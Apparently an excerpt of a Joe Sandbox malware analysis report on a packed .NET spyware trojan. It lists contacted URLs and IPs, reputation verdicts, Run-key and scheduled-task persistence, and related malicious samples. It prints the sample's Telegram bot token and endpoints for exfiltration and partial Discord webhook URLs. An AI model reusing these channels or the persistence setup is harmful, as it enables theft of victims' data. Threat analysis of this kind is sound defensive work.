https://api.telegram.org/bott-	WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.mylnikov.org	Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.orgd	WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2527964251.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocumentT	WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003208000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessageT	WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003279000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendM	WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000019.00000002.2270356962.0000015CC1787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019134E1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A0BAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8F738000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	Avira URL Cloud: safe	unknown
https://api64.ipify.org/t	WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.30.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmp5E28.tmp.dat.21.dr	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org0	WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	URL Reputation: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&	Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn	Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api64.ipify.org	WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	WinDefend.exe, 00000004.00000002.3430651015.000000000B845000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.p	Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5	Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgn	WinDefend.exe, 0000001F.00000002.3288810827.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.newtonsoft.com/jsonschema	Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	tmp5E28.tmp.dat.21.dr	false	URL Reputation: safe	unknown
http://www.codeplex.com/DotNetZip	Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa	ce3ed400-d1e84918ad678b08d2a369a3-Latest.log.21.dr	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org	tmp5E28.tmp.dat.21.dr	false	URL Reputation: safe	unknown
https://urn.to/r/sds_see	Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.mylnikov.org	Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
64.185.227.155	api64.ipify.org	United States	18450	WEBNXUS	false
66.235.168.242	unknown	United States	397423	TIER-NETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446514
Start date and time:	2024-05-23 15:33:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	66
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@118/59@6/6
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 73% Number of executed functions: 146 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, sc.exe, dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 87.248.204.0, 20.42.65.92, 93.184.221.240
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
Execution Graph export aborted for target SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, PID 6176 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4476 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:33:55	API Interceptor	2030164x Sleep call for process: WinDefend.exe modified
09:34:03	API Interceptor	1x Sleep call for process: Loader.exe modified
09:34:03	API Interceptor	1x Sleep call for process: Loaader.exe modified
09:34:13	API Interceptor	130x Sleep call for process: powershell.exe modified
09:34:36	API Interceptor	1x Sleep call for process: WerFault.exe modified
15:33:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run YourAppName C:\Users\user\AppData\Local\Temp\WinDefend.exe
15:33:57	Task Scheduler	Run new task: Loaader path: "C:\Users\user\AppData\Roaming\Loaader.exe"
15:33:57	Task Scheduler	Run new task: Loader path: "C:\Users\user\AppData\Roaming\Loader.exe"
15:34:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run YourAppName C:\Users\user\AppData\Local\Temp\WinDefend.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	RFQ-101432620247fl#U00e2#U00aexslx.exe	Get hash	malicious	AgentTesla	Browse
	QUOTATION SHEET_RFQ 564077 2024.5.17.exe	Get hash	malicious	AgentTesla	Browse
	MSK203.exe	Get hash	malicious	GuLoader	Browse
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse
	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse
	Pg5dhIO92K.exe	Get hash	malicious	AgentTesla	Browse
	Shipping Reference_AWB 703280542_INVOICE_PDF.exe	Get hash	malicious	AgentTesla	Browse
	4289397_SEA SHIPMENT.exe	Get hash	malicious	AgentTesla	Browse
	PAYMENT COPY 02521.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse
	ERsg2wzaD4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
208.95.112.1	PO_23052024.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	MOLEX 436500304-10000.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	ip-api.com/line/?fields=hosting
	INVOICE.js	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	C30XdMP03R.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	NTgo4SxmS3.exe	Get hash	malicious	Blank Grabber, DCRat	Browse	ip-api.com/json/?fields=225545
	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	documentos.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api64.ipify.org	http://iyfhshsp.com/Stockyard.cfm?domain=ontariostockyards.on.ca&fp=CIJaHXP%2F0skOkNSQd%2F4jtYF3X0QXgT%2B41bUKlz9x8WIfofj6IPTV8ScBtVOQWLtb%2FRwG%2FSkHiiHeZllib976kXCJ4XMA794ZiznRS1wP5Uf04A9tPtI%2B0LoCkzGPdAHYsRq7MR7MdbFPY6oXhvApuHKBrlR32ugZAs8XzrJENmfc665HHXmTlZitcPeywgrTHI6o1222VmPYvgQj3BF3SrPGahD54P8mb7wnGA1Iq2VkMCzKYfTBs9TsEjTlKq4y0VG2Wfe4HZz%2FfV4Kj9e8srxlzEkIc8wqr0A4WlsXH8B6EYuy9GOPwGtl0mU5fDBh&yep=RVNTenhI%2BK5wtfh2y3hvr0C%2Bf8yLo0OquMvUcIDm2pI%2BazRSAc%2BgO8tqXXkadYdZm%2FCdVtUW6v4fRHfi2iLasg4ugBXXocFy%2BKZRh8tTJ%2B1hPAPyIid9TVDBqYtpHTyVkiaz87oq7ncPzsby9Tg3T2j1RIiGpW1BmK%2FTrWUih%2FXnDRKhZFMjpokW5c0YMS1fK3J7%2Bd66FySEOnk4uznr%2Bj2iXwlpK45ddD%2FQhCQdRbSYtXyK6Y%2BnNH0XmeriKJQq30PcKbP2b2rfFFjMfmciNCzMIuHsxuylX1DCXMJkN7S2Y8niXSmMcZHZ2gbvX7m%2FOujBxUYqP4pl5pesXzNvel9QWXdbhQ6U03mTXDA670%2FoRFLT8ez1b%2BRvdcfRh2IRVZ3USOJ7UUDZsD%2B4qi731tfoY%2BuT2tHsaGjnJUDy6MSUl743ntfchbV8KuCXmSn1XmeM0kBMR7GWGmgarnEPN%2Fu7tqup9nk129kApIU2XJazrgl2BHASztPoRHJA4xbNJbkTRaDBlHCK9N67TWzrLkFiJ4twAESoSeN26JeN